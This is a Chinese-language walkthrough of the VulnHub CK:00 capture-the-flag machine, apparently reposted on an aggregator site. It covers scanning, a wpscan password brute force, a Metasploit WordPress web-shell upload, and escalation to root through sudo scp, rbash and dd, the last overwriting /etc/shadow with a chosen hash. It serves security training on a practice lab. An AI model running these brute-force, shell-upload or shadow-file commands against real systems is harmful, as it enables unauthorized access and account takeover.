VulnHub:CK00

靶场搭建

靶机下载地址:CK: 00 ~ VulnHub

下载后,在vmware中打开靶机。

  1. 修改网络配置为NAT

  2. 处理器修改为2

  3. 启动靶机

靶机ip扫描不到的解决办法

  1. 靶机开机时一直按shift或者esc直到进入GRUB界面。

  2. 按e进入编辑模式,找到ro,修改为如下内容。ctrl+x重启服务。

    rw signie init=/bin/bash quiet
  3. 进入如下页面。如果没有进入说明第二步修改错误,重新执行1,2步。                                  

  4. ip a查看网卡信息。这里网卡是ens33。                                                                                  

  5. 打开网卡配置文件vi /etc/netplan/50-cloud-init.yaml。                                                    

    发现网卡名称不一致,按i修改为以下内容。增加的内容主要是为了将ens33网卡ip配置成攻击机同网段。                                    

    • addresses: [ip/24]

    • gateway4: 网关

    • nameservers: addresses: [dns]

  6. netplan apply生效,再重启靶机即可修改成功。

如果上述步骤仍然不行,在步骤5前增加一步:apt install ifupdown resolvconf

信息收集

主机发现

nmap 192.168.233.0/24 -sP -T4

靶机ip为:192.168.233.121。

端口扫描

nmap 192.168.233.121 -A -T4

开放22,80端口。

目录扫描and网站指纹

首先看看80端口网站首页。最重要的信息是WordPress。

网站指纹扫描确认一下。

whatweb http://192.168.233.121

该网站的确由WordPress搭建。继续目录扫描。

dirsearch -u http://192.168.233.121

根据扫描结果,发现有重定向到ck这个域名的情况,直接访问报错报错,因此需要修改一下hosts文件,vim /etc/hosts,增加一条主机名和IP地址的映射关系:

192.168.233.121  ck

访问/wp-login.php。需要用户密码,用wpscan进行枚举。

访问/wp-includes。没找到名字和内容敏感的文件。

wpscan

根据前面的信息收集,80端口的网站由WordPress搭建,我们使用wpscan(WordPress扫描工具)扫描,目的是枚举用户和密码。

# 枚举用户,插件,主题
wpscan --url http://192.168.233.121 --enumerate u,p,t

根据扫描结果,发现存在admin用户。接下来使用wpscan爆破密码。

wpscan --url http://192.168.233.121 --passwords 字典路径 --usernames admin --max-threads 100

密码是admin。成功登入wordpress后台。

2、漏洞利用

已知WordPress用户名和密码,打开msf,使用unix/webapp/wp_admin_shell_upload模块。

msfconsole
search wp_admin
use 0
options
set rhosts 192.168.233.121
set password admin
set username admin
run

成功拿到meterpreter,看到当前权限不高。进入shell模式,进行信息收集。

shell
# 显示用户名和路径(可以不执行这一步)
python3 -c 'import pty;pty.spawn("/bin/bash")'

切换到home目录,发现存在ck,bla,bla1三个用户。在/home/ck路径下发现第一个flag。

在wp-config.php中找到数据库用户名和密码。cat /var/www/html/wp-config.php

3、提权

得到的密码尝试确认是bla用户的密码。

sudo -l想办法提权。可用利用scp命令拿到bla1的shell。

scp提权

搜一下scp如何提权。百度告诉我们执行以下四步即可提权。

做一下修改,因为是切换到bla1所以命令应该是:sudo -u bla1 scp -S $TF x y:。命令执行后报错Can't open /tmp/tmp.kPOFihNHbV,chmod将这个文件的权限修改为777即可。

rbash

继续提权sudo -l

提示我们利用/bin/rbash拿到ck-00的shell,无密码。rbash是什么,rbash是受限制的 bash,这里可以就当作是/bin/bash使用,直接切换到ck-00。

sudo -u ck-00 /bin/rbash

sudo -l。提示我们通过dd提权到root权限。

dd提权

dd命令是用于读取、转换、输出数据的,dd提权主要是利用对数据的转换来实现的,比如:替换root用户密码hash值从而修改密码达到提权的目的。

在攻击机上生成明文密码的hash。使用mkpasswd生成sha-512加密算法的hash。

# -m 指定加密方式
mkpasswd -m sha-512 123456

参照kali中shadow文件root用户的用户信息,将第二个参数密码的hash值替换成刚刚生成的hash值并保存起来备用。

cat /etc/shadow
# 将结果复制出来,替换一下root用户的hash值
root:$6$lpM1sB/rsDFuAgCN$4kuMA2zqpN9z2O5c5B27GQd.SY3L/R3zC1z4CAQXRJ4jgxW81F3xsE08l7A./1SxBuW/31YBTgcqzKZEI0n.j1:18878:0:99999:7:::

到靶机中,将etc/shadow替换为刚刚备好的内容。

echo 'root:$6$lpM1sB/rsDFuAgCN$4kuMA2zqpN9z2O5c5B27GQd.SY3L/R3zC1z4CAQXRJ4jgxW81F3xsE08l7A./1SxBuW/31YBTgcqzKZEI0n.j1:18878:0:99999:7:::' | sudo dd of=/etc/shadow

执行完毕后,切换到root用户,输入我们设置的密码即可。

get root flag🎆

总结

这里推荐一个网站GTFOBins,用于找提权利用方式的网站。

例如:需要利用dd命令提权,访问该网站,输入dd。

点开后会显示利用方法。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/web/46220.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

思路|如何利用oneNote钓鱼?

本文仅用于技术研究学习,请遵守相关法律,禁止使用本文所提及的相关技术开展非法攻击行为,由于传播、利用本文所提供的信息而造成任何不良后果及损失,与本账号及作者无关。 本文来源无问社区,更多实战内容,…

[python]pycharm设置清华源

国内镜像源有以下几个,因为都是国内的,基本速度差不了太多。 清华:https://pypi.tuna.tsinghua.edu.cn/simple 阿里云:http://mirrors.aliyun.com/pypi/simple/ 中国科技大学 https://pypi.mirrors.ustc.edu.cn/simple/ 豆瓣&…

爬虫案例(读书网)(下)

上篇链接: CSDN-读书网https://mp.csdn.net/mp_blog/creation/editor/139306808 可以看见基本的全部信息:如(author、bookname、link.....) 写下代码如下: import requests from bs4 import BeautifulSoup from lxml import etreeheaders{…

scottplot5 中 使用signalXY图,如何更新数据?

🏆本文收录于《CSDN问答解答》专栏,主要记录项目实战过程中的Bug之前因后果及提供真实有效的解决方案,希望能够助你一臂之力,帮你早日登顶实现财富自由🚀;同时,欢迎大家关注&&收藏&…

Apache POI 使用Java处理Excel数据 进阶

1.POI入门教程链接 http://t.csdnimg.cn/Axn4Phttp://t.csdnimg.cn/Axn4P建议&#xff1a;从入门看起会更好理解POI对Excel数据的使用和处理 记得引入依赖&#xff1a; <dependency><groupId>org.apache.poi</groupId><artifactId>poi</artifactI…

JVM高频面试点

文章目录 JVM内存模型程序计数器Java虚拟机栈本地方法栈Java堆方法区运行时常量池 Java对象对象的创建如何为对象分配内存 对象的内存布局对象头实例数据对齐填充 对象的访问定位 垃圾收集器找到垃圾引用计数法可达性分析&#xff08;根搜索法&#xff09; 引用概念的扩充回收方…

【Socket套接字编程】(实现TCP和UDP的通信)

&#x1f387;&#x1f389;&#x1f389;&#x1f389;点进来你就是我的人了 博主主页&#xff1a;&#x1f648;&#x1f648;&#x1f648;戳一戳&#xff0c;欢迎大佬指点&#xff01; 人生格言: 当你的才华撑不起你的野心的时候,你就应该静下心来学习! 欢迎志同道合的朋友…

创建通用JS公共模块并发布至npm

title: 创建通用JS公共模块并发布至npm tags: UMD rollup verdaccio npm categories: 模块化 概要内容 创建&#xff1a;JS公共模块 打包&#xff1a;使用rollup 打包公共模块 发布&#xff1a;js公共模块至verdaccio平台 发布&#xff1a;js公共模块至npm平台 如何创建JS公共模…

【PostgreSQL】Windows 上安装 PostgreSQL 16版本

博主介绍:✌全网粉丝20W+,CSDN博客专家、Java领域优质创作者,掘金/华为云/阿里云/InfoQ等平台优质作者、专注于Java技术领域✌ 技术范围:SpringBoot、SpringCloud、Vue、SSM、HTML、Nodejs、Python、MySQL、PostgreSQL、大数据、物联网、机器学习等设计与开发。 感兴趣的可…

基于jeecgboot-vue3的Flowable流程仿钉钉流程设计器-支持VForm3表单的选择与支持

因为这个项目license问题无法开源&#xff0c;更多技术支持与服务请加入我的知识星球。 1、初始化的时候加载表单 /** 查询表单列表 */ const getFormList () > {listForm().then(res > formOptions.value res.result.records) } 2、开始节点的修改&#xff0c;增加表…

计算机的错误计算(三十四)

摘要 用错数预测 &#xff08;或 pow(a,x)&#xff09;函数的结果中含有的错误数字的个数&#xff0c;并与Visual Studio 和Excel 的输出中含有的错误位数相比较。结果显示&#xff0c;预测与实际一致。 对于 &#xff08;或 pow(a,x)&#xff09;函数&#xff0c;根据 与 的不…

3.RabbitMQ安装-Centos7

官方网址&#xff1a;gInstalling RabbitMQ | RabbitMQ 安装前提&#xff0c;需要一个erlang语言环境。 下载 erlang: Releases rabbitmq/erlang-rpm GitHub rabbitmq-server: 3.8.8 Releases rabbitmq/rabbitmq-server GitHub 安装命令 (说明i表示安装&#xff…

SCI一区级 | Matlab实现SSA-CNN-GRU-Multihead-Attention多变量时间序列预测

目录 效果一览基本介绍程序设计参考资料 效果一览 基本介绍 1.【SCI一区级】Matlab实现SSA-CNN-GRU-Multihead-Attention麻雀算法优化卷积门控循环单元融合多头注意力机制多变量时间序列预测&#xff0c;要求Matlab2023版以上&#xff1b; 2.输入多个特征&#xff0c;输出单个…

一文掌握Prometheus实现页面登录认证并集成grafana

一、接入方式 以保护Web站点的访问控制&#xff0c;如HTTP 服务器配置中实现安全的加密通信和身份验证&#xff0c;保护 Web 应用程序和用户数据的安全性。 1.1 加密密码 通过httpd-tools工具包来进行Web站点加密 yum install -y httpd-tools方式一&#xff1a;通过htpasswd生…

智慧物流园区整体架构方案(46页PPT)

PPT介绍 将深入探讨如何通过高度集成的信息技术和物联网设备&#xff0c;打造一个自动化、高效与可持续发展的现代物流体系。该方案从智能感知层开始&#xff0c;利用传感器、RFID技术、GPS等手段实时采集物流数据&#xff1b;接着是网络传输层&#xff0c;借助高速且稳定的通信…

姓名配对测试源码

源码简介 姓名配对测试源码&#xff0c;输入两人姓名即可测试缘分&#xff0c;可查看朋友到底喜欢谁的趣味源码。 自己手动在数据库里修改数据&#xff0c;数据库里有就会优先查询数据库的信息&#xff0c; 没设置的话第一次查询缘分都是非常好的 95-99&#xff0c;第二次查…

C++ map和set的使用

目录 0.前言 1.关联式容器 2.键值对 3.树形结构的关联式容器 3.1树形结构的特点 3.2树形结构在关联式容器中的应用 4.set 4.1概念与性质 4.2使用 5.multiset 5.1概念与性质 5.2使用 6.map 6.1概念与性质 6.2使用 7.multimap 7.1概念与性质 7.2使用 8.小结 &a…

Spring MVC 中 HttpMessageConverter 转换器

1. Spring MVC 中 HttpMessageConverter 转换器 文章目录 1. Spring MVC 中 HttpMessageConverter 转换器2. 补充&#xff1a;什么是 HTTP 消息3. 转换器3.1 转换器转换的是什么 4. Spring MVC中的 AJAX 请求5. ResponseBody 将服务器端的 return 返回值转化为“字符串(JSON格式…

rtf是什么格式的文件?rtf格式和word的区别是什么?

RTF是什么格式的文件? RTF&#xff08;富文本格式&#xff0c;Rich Text Format&#xff09;和Word文档&#xff08;以.doc和.docx为扩展名的Microsoft Word文档&#xff09;是两种常用的文本文件格式。它们在文件结构、兼容性、功能和使用场景等方面存在一些显著差异。 比如…

arcgis怎么选取某个指定区域地方的数据,比如从全国乡镇数据选取长沙市乡镇数据

一共5个步骤&#xff0c;没一句废话&#xff0c;耐心看完。 1、如图&#xff0c;先将数据加载到arcgis里面&#xff0c;我们要选取里面长沙市的范围数据。 2、选取长沙市的语句 “市” like ‘长沙%’ 切记&#xff0c;切记&#xff0c;切记。所有符号要在 输入法英文状态…